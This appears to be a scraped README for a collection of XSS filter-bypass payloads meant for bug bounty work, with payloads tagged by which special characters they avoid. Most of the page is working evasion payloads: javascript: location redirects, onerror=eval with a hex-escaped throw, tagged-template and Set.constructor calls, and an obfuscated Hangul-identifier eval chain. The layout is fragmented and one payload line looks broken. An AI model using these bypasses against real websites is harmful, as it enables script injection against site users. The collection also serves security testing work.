XSS Payload without Anything.
When I work for a company or bug bounty, the unexpected hurdle is a protection(xss filter) of special char in the JS(Javascript) area. So I am devising a way to easily solve these problems, and one of the processes is this document.
Let's collect a lot of thoughts and solve our problems.
It is similar to "Payload all the things" in terms of collecting the payload, but I want to provide a list of payloads with special tag (without char, used char, other..) I plan to make it easy to search and to show what characters (or what they are made of) are unusable.
without char: ()
,
'
XSS Payload
// usedchar:
// author:
// description:
I have selected special characters that are often blocked.
( )
{ }
,
"
'
`
[ ]
\
/
;
+
.
=
(template): ()
{}
,
"
'
backtick
[]
\
/
;
+
.
=
on Github.com
- Ctrl + F >
- find your problem char
- XSS
on hahwul.com comming soon
coming soon
location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]
onerror=eval;throw'alert\x2845\x29';
prompt`45`
location='javaScriPt:alert\x2845\x29'
([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()
[45].some.alert()
Set.constructor`alert\x2845\x29`
Add issue form or pull Request
XSS Payload:
WithOut:
Description:
or ...
Tweet with me @hahwul